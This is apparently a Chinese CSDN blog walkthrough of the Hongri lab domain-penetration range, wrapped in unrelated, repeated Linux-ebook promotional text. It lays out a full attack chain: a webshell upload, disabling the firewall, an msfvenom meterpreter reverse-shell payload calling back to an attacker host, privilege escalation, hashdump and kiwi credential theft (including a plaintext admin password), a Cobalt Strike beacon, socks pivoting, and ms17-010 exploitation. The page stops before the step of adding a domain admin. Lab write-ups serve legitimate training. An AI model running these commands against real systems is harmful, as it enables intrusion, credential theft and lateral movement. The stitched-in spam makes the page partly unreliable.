2024年最全内网域渗透总结——红日靶场①_红日靶机账号密码,互联网公司面试流程&面试技巧

于 2024-05-04 06:46:56 发布
阅读量1.5k 收藏 22
点赞数 22
分类专栏: 程序员 文章标签: 面试 职场和发展
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_83946224/article/details/138433295
版权

最全的Linux教程,Linux从入门到精通

======================

  1. linux从入门到精通(第2版)

  2. Linux系统移植

  3. Linux驱动开发入门与实战

  4. LINUX 系统移植 第2版

  5. Linux开源网络全栈详解 从DPDK到OpenFlow

华为18级工程师呕心沥血撰写3000页Linux学习笔记教程

第一份《Linux从入门到精通》466页

====================

内容简介

====

本书是获得了很多读者好评的Linux经典畅销书**《Linux从入门到精通》的第2版**。本书第1版出版后曾经多次印刷,并被51CTO读书频道评为“最受读者喜爱的原创IT技术图书奖”。本书第﹖版以最新的Ubuntu 12.04为版本,循序渐进地向读者介绍了Linux 的基础应用、系统管理、网络应用、娱乐和办公、程序开发、服务器配置、系统安全等。本书附带1张光盘,内容为本书配套多媒体教学视频。另外,本书还为读者提供了大量的Linux学习资料和Ubuntu安装镜像文件,供读者免费下载。

华为18级工程师呕心沥血撰写3000页Linux学习笔记教程

本书适合广大Linux初中级用户、开源软件爱好者和大专院校的学生阅读,同时也非常适合准备从事Linux平台开发的各类人员。

需要《Linux入门到精通》、《linux系统移植》、《Linux驱动开发入门实战》、《Linux开源网络全栈》电子书籍及教程的工程师朋友们劳烦您转发+评论

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化的资料的朋友,可以点击这里获取!

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!


​![](https://img-blog.csdnimg.cn/4418f2e27bac461886a925b1378c3a99.png)


#### 利用文件上传


​![](https://img-blog.csdnimg.cn/1a199cfd021f4a53b2251e0f1bc96dac.png)


#### 蚁剑连接

#小提一下,马子上传了,不知道马子绝对路径怎么办?
#前面我们不是发现phpstudy文件夹下存在beifen.rar
#猜测应该是yxcms的备份文件
#解压之后,可通过查找acomment.php文件来确定文件上传的路径
#/yxcms/protected/apps/default/view/default



​​![](https://img-blog.csdnimg.cn/0afda1e05b99436fadcbc4599ed3017b.png)


  
 ​

#URl:http://192.168.43.17/yxcms/protected/apps/default/view/default/cmsshell.php


​![](https://img-blog.csdnimg.cn/7e2925bdf5134c08b430b09c4ee41724.png)

至此,已经拿到Webshell


### 三、后渗透


后渗透阶段,当我们已经将小马上传到web服务器上时,可以用webshell管理工具进行下一步渗透了。


#### 蚁剑终端关闭win7防火墙

#关闭win防火墙
netsh advfirewall set allprofiles state off
#查看防火墙配置状态
netsh advfirewall show allprofile state


​![](https://img-blog.csdnimg.cn/686d215a57c84258ba8faab437be21e7.png)


 ![](https://img-blog.csdnimg.cn/bdc81ab7cab141dab1d8c12dd600e062.png)


#### msf生成exe并开启监听

#kali创建后门程序
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.43.33 LPORT=10888 -f exe -o 233.exe

#蚁剑上传233.exe
#蚁剑终端运行233.exe

#kali开启监听,设置sessions
use exp/multi/handler
set payload windows/x64/meterpreter_reverse_tcp
set lhost 192.168.43.33
set lport 10888
run


​​![](https://img-blog.csdnimg.cn/f7e43b3eab9b44fd835320bf807c0ec4.png)


 ![](https://img-blog.csdnimg.cn/03d1558aa7d34bbab44ff4f7876536e8.png)


#### 拿到win7shell

#尝试提权
#因为是administrator用户,
#所以很容易提权成功。
shell
getuid
getsystem
getuid


​![](https://img-blog.csdnimg.cn/1150e6fa2e794f0281bed123f739ddc6.png)


#### 利用msf进行内网信息收集

chcp 65001 —可解决乱码问题
route print —锁定内网C段
net time /domain —锁定域控192.168.52.138
net user /domain —锁定域内五个账户
ipconfig /all —锁定域名
net view —锁定域内主机
net group “domain admins” /domain —查询域管理员

域名:god.org
域内五个用户:Administrator、Guest、liukaifeng01、ligang、krbtgt
域内三台主机:OWA(win2k8)、ROOT-TVI862UBEH(192.168.52.141)、STU1(win7)
域控:OWA(192.168.52.138)
win7内网ip:192.168.52.143


​![](https://img-blog.csdnimg.cn/ce4b29d1b47b45bf8385d7a239bb066e.png)


​![](https://img-blog.csdnimg.cn/38ab320f01d140718403c46fa4594be0.png)


​![](https://img-blog.csdnimg.cn/d4600bb2030b441fba1321f51e2ef6be.png)


#### hashdump

hashdump —导出本地用户账号密码,该命令的使用需要系统权限。


​![](https://img-blog.csdnimg.cn/46e91bc3031b4ca6b973dcba37e65b51.png)

#CMD5解密
—#hash解密为空:
—#因为当系统为win10或2012R2以上时,
—#默认在内存缓存中禁止保存明文密码,密码字段显示为null,
—#需要修改注册表等用户重新登录后才能成功抓取。


​![](https://img-blog.csdnimg.cn/86d90944e92b479e90dff9f183d47752.png)


#### 抓取域内账密

#利用msf的kiwi模块+system权限
load kiwi #加载kiwi模块
help kiwi #查看kiwi模块的使用
creds_all #列举所有凭据
creds_kerberos #列举域内账密 Administrator admin@123


​![](https://img-blog.csdnimg.cn/864d559621cc40c8adc69b17acbd5b06.png)


​![](https://img-blog.csdnimg.cn/1716783b7d5f454d940acedd0bce599c.png)


#### CS上线win7

#楼楼用的是tools的CS
#CS的基本使用楼楼就不做多说明了
#kali机作为服务端,本地win11为客户端
#服务端启动
./teamserver 192.168.43.33 123456

这里的ip是服务端ip,后续客户端连接此ip登录

win11:
直接运行runcatcs.vbs即可(仅限windows),
其他系统执行:java -jar cat_client.jar client

#设置监听器
#生成木马–>artifactHRmsf.exe


​![](https://img-blog.csdnimg.cn/5347bb0d754c4e7ca0394b5fa2cc8c7d.png)


​![](https://img-blog.csdnimg.cn/89eae3569f9548b081ad62e248fc359d.png)

#蚁剑上传artfactHRmsf.exe到win7
#运行木马程序
#CS上线成功


​![](https://img-blog.csdnimg.cn/bde0ea88b6ba43b9b04076e0f4e53415.png)

#简单提权
elevate —#提权成功
sleep 1 —#设置回弹时间间隔


​![](https://img-blog.csdnimg.cn/909c1235564e45b7bfa9537260ada696.png)


### 四、横向渗透


为了让 msf 能访问内网的其他主机,即 52 网段的攻击流量都通过已渗透的这台目标主机(Win7)的meterpreter会话来传递,需要建立socks反向代理。


#### socket代理

#添加代理
run autoroute -s 192.168.52.0/24 # 添加内网的路由
run autoroute -p # 查看路由


​![](https://img-blog.csdnimg.cn/29e1240c30504ed59edb6a31d14ba6b5.png)

#开启代理
background #将此会话保存为一个sessions
use auxiliary/server/socks_proxy
set VERSION 4a
set SRVPORT 9080
set SRVHOST 127.0.0.1
run
jobs #运行后挂起一个job


​![](https://img-blog.csdnimg.cn/688fc3528f014e41bc8b864f56282989.png)

#修改配置文件
#在proxychains的配置文件
vim /etc/proxychains4.conf
#​添加本机的1080端口:
socks4 127.0.0.1 1080
#ping 域内成员


​![](https://img-blog.csdnimg.cn/e6d1313bcc83477faf00c3a88c9c1abb.png)


#### 漏洞扫描

#利用nmap对域内主机进行漏洞扫描
nmap --script=vuln 192.168.52.141
nmap --script=vuln 192.168.52.143
nmap --script=vuln 192.168.52.138
#发现都存在ms17_010漏洞


​![](https://img-blog.csdnimg.cn/72f338bc264d4b1cb5b5ffa8fc0d280c.png)![](https://img-blog.csdnimg.cn/7e15241c4b1f406ab869216ca0b80697.png)![](https://img-blog.csdnimg.cn/cb92f69dc5204b79bb7d3777b70d1414.png)


#### msf利用ms17-010

search ms17-010
use 2
set RHOST 192.168.52.141/143/138
set COMMAND net user
run
#发现除了win7。win2k3,win2k8都可以利用成功


​![](https://img-blog.csdnimg.cn/52917d5fed3b45ffb3a6a087d752c2bf.png)![](https://img-blog.csdnimg.cn/531b394389ca4311878c88d7984df0de.png)


​win7利用失败


​![](https://img-blog.csdnimg.cn/3f34289e88f54e708741ae60d8c4adf2.png)


#### 尝试给域控win2k8添加管理员



![](https://img-blog.csdnimg.cn/img_convert/9a8cb5f8c0ec69e6499adead0da6e95b.png)


最全的Linux教程,Linux从入门到精通

======================

1.  **linux从入门到精通(第2版)**

2.  **Linux系统移植**

3.  **Linux驱动开发入门与实战**

4.  **LINUX 系统移植 第2版**

5.  **Linux开源网络全栈详解 从DPDK到OpenFlow**



![华为18级工程师呕心沥血撰写3000页Linux学习笔记教程](https://img-blog.csdnimg.cn/img_convert/59742364bb1338737fe2d315a9e2ec54.png)



第一份《Linux从入门到精通》466页

====================

内容简介

====

本书是获得了很多读者好评的Linux经典畅销书**《Linux从入门到精通》的第2版**。本书第1版出版后曾经多次印刷,并被51CTO读书频道评为“最受读者喜爱的原创IT技术图书奖”。本书第﹖版以最新的Ubuntu 12.04为版本,循序渐进地向读者介绍了Linux 的基础应用、系统管理、网络应用、娱乐和办公、程序开发、服务器配置、系统安全等。本书附带1张光盘,内容为本书配套多媒体教学视频。另外,本书还为读者提供了大量的Linux学习资料和Ubuntu安装镜像文件,供读者免费下载。



![华为18级工程师呕心沥血撰写3000页Linux学习笔记教程](https://img-blog.csdnimg.cn/img_convert/9d4aefb6a92edea27b825e59aa1f2c54.png)



**本书适合广大Linux初中级用户、开源软件爱好者和大专院校的学生阅读,同时也非常适合准备从事Linux平台开发的各类人员。**

> 需要《Linux入门到精通》、《linux系统移植》、《Linux驱动开发入门实战》、《Linux开源网络全栈》电子书籍及教程的工程师朋友们劳烦您转发+评论




**网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**

**[需要这份系统化的资料的朋友,可以点击这里获取!](https://bbs.csdn.net/topics/618542503)**

**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**
2401_83946224
关注
  • 22
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
3.centos网络配置-vim-常用操作
qq_22849845的博客
06-20 861
Linux基本操作
大数据与云计算——部署Kubernetes集群并完成nginx部署(超级详细!)
未来社会二十年发展的核心技术趋势由ABCD四个字母组成,分别是AI(人工智能)、BlockChain(区块链)、Cloud(云)、和Data(大数据)每一次进步都有新的认知和感触
08-01 3902
Kubernetes 集群是由多个物理或虚拟计算机组成的集合,用于运行和管理容器化应用程序。集群中的计算机被称为节点,其中包括一个主节点 (Master Node) 和多个从节点 (Worker Nodes)。在 Kubernetes 集群中,主节点负责管理和控制整个集群的操作。它运行了一系列核心组件,如 kube-apiserver、kube-controller-manager、kube-scheduler 和 etcd。主节点与从节点之间通过 API 通信,并负责调度容器、监视集群状态、处理节点故障等
linux本地yum挂载实践
m0_60797416的博客
03-09 649
本方法适用于:linux无法挂载官方yum源或无本地无yum仓库的场景,因为手动安装依赖包是极其麻烦的事,需要花费大量的时间寻找rpm包并导入到虚拟机去逐个安装。删除linux自带的yum仓库,在root用户下进行操作,注意是删除当前文件夹下所有rm -rf ./*yum源,所以yum源挂到/media,会把iso文件,挂到/media下。配置本地yum源,在当前目录下创建base.repo文件;新挂yum源后,用yum makecache更新缓存;出现以上结果,表明本地yum源挂载成功;
1、通用挂载yum源
qq_52572989的博客
12-15 1551
挂载yum源
Linux red hat 9.0的本地源和国内镜像源配置
最新发布
2301_77580479的博客
03-06 1226
若需要在Linux系统上下载软件,系统是自动在/etc/yum.repos.d配置文件里面进行加载的,且只加载所有以.repo结尾的文件,此时我们就要在/etc/yum.repos.d 这个配置文件当中配置一个以.repo结尾的文件。看到8.0g的文件,就表示该文件就是我们所需要的.iso文件此时可以创建一个文件目录或者是用Linux系统自带的目录/mnt/media。这个文件名可以随意编写,我们编制的则为redhat.repo在该文件中进行配置,配置内容如下。配置成功后这可以将仓库信息列出来查看。
内网渗透文档过程有截图
07-02
本资源总结内网渗透测试的整个过程,从设置虚拟机网络环境到生成 payload 并进行渗透测试。下面是本资源中所涉及的知识点: 1. 虚拟机网络环境设置:在 VMware 中设置虚拟机网络环境,使用桥接模式模拟公网,桥...
内网渗透思维导图指北
10-04
内网渗透思维导图指北
完整的内网渗透-暗月培训之项目六1
08-03
1. 环境介绍3 2. 信息收集3 3. 对网站进行安全检测4 5. 跨网段渗透15
2022最新Java面试题及答案总结
08-04
2022夏招、秋招高频面试真题及答案,八股文背诵必备文档。涵盖Java基础、JVM、线程相关、HTTP代理等相关知识。节选: 如何实现跨? 方式一:图片ping或script标签跨 图片ping常用于跟踪用户点击页面或动态广告...
上海网互联网接入用户承诺书.docx
11-12
上海网互联网接入用户承诺书.docx
使用Kubernetes部署Springboot或Nginx的详细教程
01-09
1 前言 经过《Maven一键部署Springboot到Docker仓库,为自动化做准备》,Springboot的Docker镜像已经准备好,也能在Docker上成功运行了,是时候放上Kubernetes跑一跑了。这非常简单,一个yaml文件即可。 2 一键部署Springboot 2.1 准备yaml文件 当准备好镜像文件后,要部署到Kubernetes就非常容易了,只需要一个yaml格式的文件即可,这个文件能描述你所需要的组件,如Deployment、Service、Ingress等。定义如下: apiVersion: apps/v1 kind: Deployment metadata:
inception-resnet-v1-caffe
03-27
caffe版inception-resnet-v1的网络描述文件,在padding和stride上有所微调,输入输出大小及超参数形状与github开源的facenet使用的inception-resnet-v1网络完全一致。文件共计6230行。注意:不提供caffemodel。
CentOS7中vi/vim编辑器的使用
上庸者-不服周
06-16 7198
Linux常用编辑器Vi/Vim
centos中安装vim
一杯咖啡半杯糖的博客
05-31 5692
yum -y install vim*
Centos 6.5 制作本地YUM源(挂载盘方式)
零界镰刀的博客
03-09 9729
1.设置挂载盘2.创建文件目录:mkdir /mnt/cdrom 挂载光盘到此路径 : mount -t iso9660  -o ro  /dev/cdrom   /mnt/cdrom为了避免每次重启后都要手动mount,可以在/etc/fstab中加入一行挂载配置,即可自动挂载vi  /etc/fstab/dev/cdrom              /mnt/cdrom            ...
nslookup命令反解ip_PING、TRACERT、NSLOOKUP命令的使用方法
weixin_39604189的博客
11-22 1519
在日常运维中,我们经常用到ping、tracert、nslookup命令,下面简单介绍下命令的用法。1,pingping命令 用于验证与远程计算机的连接。开始->运行或WIN+R键,输入cmd 回车,会出现一个黑色窗口,进入如图所示的界面cmd然后直接输入ping www.baidu.com(换成您要测试的名或IP,注意ping后面要有空格)。回车得到如图所示的结果:ping从返回结果中我...
内网控信息需要收集哪些
03-31
1.名(Domain Name) 2.控制器IP地址(Domain Controller IP Address) 3.管理员账户信息(Domain Administrator Account Information) 4.控制器操作系统信息(Domain Controller Operating System Information) 5.用户账户信息(Domain User Account Information) 6.组账户信息(Domain Group Account Information) 7.策略信息(Domain Policy Information) 8.安全事件日志(Domain Security Event Logs) 9.用户登录日志(Domain User Login Logs) 10.组成员信息(Domain Group Member Information) 11.计算机信息(Domain Computer Information) 12.名服务器信息(Domain Name Server Information) 13.控制器配置信息(Domain Controller Configuration Information) 14.控制器远程访问日志(Domain Controller Remote Access Logs) 15.控制器备份和恢复信息(Domain Controller Backup and Recovery Information)

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值